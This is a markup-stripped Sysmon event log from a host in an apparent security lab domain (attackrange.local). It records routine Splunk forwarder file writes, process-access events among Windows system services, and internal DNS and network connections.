13:57:18.072{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DF716BEC23705E935C5D9826C85792A,SHA256=E031B5CABEBC05A6368385BDDA3B5C7317399E23A1949CCD408C46C42805CF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201214Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.775{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54D6A4D4D470825481A09A5C2B3A2FEF,SHA256=15DB443C170A11E4A68BB8CD3BE887E6222F4EC8B7A04061D3CAF22EEFF48A8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201213Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.572{5ABCFE62-E73F-6040-FA4D-00000000AD01}50042616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201212Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.447{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E73F-6040-FA4D-00000000AD01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201211Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.447{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201210Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.447{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201209Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.447{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201208Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.447{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201207Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.447{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E73F-6040-FA4D-00000000AD01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201206Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.447{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E73F-6040-FA4D-00000000AD01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201205Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.448{5ABCFE62-E73F-6040-FA4D-00000000AD01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201204Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.088{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB2094F907F0FEB543B83B0EEA7AC4A,SHA256=87D2A78EB06A4DCAE167C7C6E4DA52DD1F7E48CF7087CD4680AF2700184C2C65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201215Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:20.088{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3174EDE7363A0E431AB295BD32D53D5,SHA256=73FCB6F4F1CC0AB8F7DC29F7E1398111030551E2AF5CCE9C1AE249E35C2A5F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201217Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:21.338{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7214D54D2E1626C6DB9F2EBD9518B850,SHA256=3E317E4DEB7642F5CDB0C3E8A887EF4A591300BB82DACBAA871FBED307851D8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201216Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:21.119{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35E4BFDD86379FA5F57B6D408F15A3DE,SHA256=634998727D5EAF7148343837CA091AB84EB11C59512E851FEF1C37277FECB0C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201221Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.127{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local59286- 354300x80000000000000002201220Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.002{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55192-false10.0.1.12-8000- 23542300x80000000000000002201219Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:22.197{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=8F60C2D2D5D5044DC301489DB1D5EB41,SHA256=07563703928E4F30B45F2C82620EB6741B5AA5221310696D6B727A75BD931A17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201218Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:22.181{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4411F12E0DBCB00E41168515B72D24BB,SHA256=4AFBB7253BCEAF21A96B8CE52A8119C0F459F8FEC22A60D12E5E7E3B4A327B54,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201223Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:19.142{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-59286- 23542300x80000000000000002201222Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:23.181{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9472CC7DE511F887AA6E03585F8AE678,SHA256=EAD212C64018245A6F289201433A7047159189E2F8CBA6ED0F68451312A3953B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201224Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:24.197{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9DBE77990739AE8357CF13876A74BB,SHA256=F0E6AF54CCBED47F9AAED01A131D9746CB3DB638BFBCAD10F167169B3A9D36BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201226Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:25.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C98D7E7DF0FEE884CE58E87DE6B8661E,SHA256=06BE1DE22DB505556D104FC1BD0F2E1AC2ADB783FFB6077FBC397BE9FF2FA4DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201225Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:25.213{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C7D15123685FD569977AB8AB15B83D,SHA256=237780D92A8EAD43DD120DEEBCED9AE141FAFD6D9CE74B36AFDC6BAB9F893B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201228Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:26.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D15686E0ECB0EE69CF3713ED462149A1,SHA256=E940BFA64363A18336B136868FC27553CCBA9B07EAED1FB8CAE36E90A3622951,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201227Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:22.049{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55193-false10.0.1.12-8000- 23542300x80000000000000002201229Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:27.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDBE85583DB03E533FA1C0ED4C02F05E,SHA256=A52DB86CF238704B767CDDC1F78F4A43E40EC748C88C886C29069BEC2E49AB00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201230Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:28.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98FBBBA137E970949C9F13B8E90B6E3B,SHA256=EF7769EBF7C84FC0A18D2F9FA22128564A88AC2110B0C269C01BAEDD34F4F5EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201232Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:29.416{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6196EA7338E7F836175292F11DEF2E6B,SHA256=B80BDF2625AF2C0FAEE4C0B7AF2B0215F776D191AC23B3FA9CE108E9038A8930,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201231Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:29.260{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F97D6B249335A45F68012AF5562AE3E,SHA256=6360E4E72C84EF76B030FD7961D220D97365D6E34C7DB2E9E7EFA60AA4B4FF82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201233Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:30.291{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BDB1B9CA11824198DED7346D337C6E3,SHA256=4F405177A94CFB0B21A722B45ECB303A07842297E9C2450289A49DD9ABE97F5B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201235Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:27.080{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55195-false10.0.1.12-8000- 23542300x80000000000000002201234Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:31.322{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87B24E1439D76C0B796A2F590280482A,SHA256=305D5259DE9D23E6BA8F5832EF9C9EB43EBC9B750717615D0252E94629882027,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201236Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:32.338{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D5586A7C1980A388236AD7E7B57D94E,SHA256=49BACF573F7B68A99DE06FA35AA2A5ECC0CD740A83F7B6B572FD2C877766C8CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201237Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:33.353{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E7F30788EA0BD7FDD396DD29E7F8AC5,SHA256=3A4F86651FCF3C76CA112550B55F074AA24CA6BDA308248CE3EA216A43C656C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201238Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:34.369{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370722B814F90B19FBF29D452D2F0A8D,SHA256=CAD2B1CE47F5DE5CD0A46F9970FB13D2FD41C36FA85E88FEBFE7CA0E2AEE9A81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201242Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:35.400{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBDC00F863DD5C8A0EB86811A40D48EB,SHA256=5327A98240F415E7D38E2677C5F5E50D627E4E6497273214B2B854841793ECE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201241Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:35.197{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201240Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:35.197{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201239Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:35.197{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201245Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:36.416{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=622693CD8857FDFB598FF3CDD55ADE0A,SHA256=F6CE4868DBFD9F9CA30175005FAED0C023601E166ECFC4E686549E4CE928F41D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201244Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:36.056{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94690105623F9A444F7659C94846AD99,SHA256=0F569F1B5AE0A9933A71F4F767AFD3E3E6DAA98A1B1FEBFB34CCD4E5259D1F9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201243Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 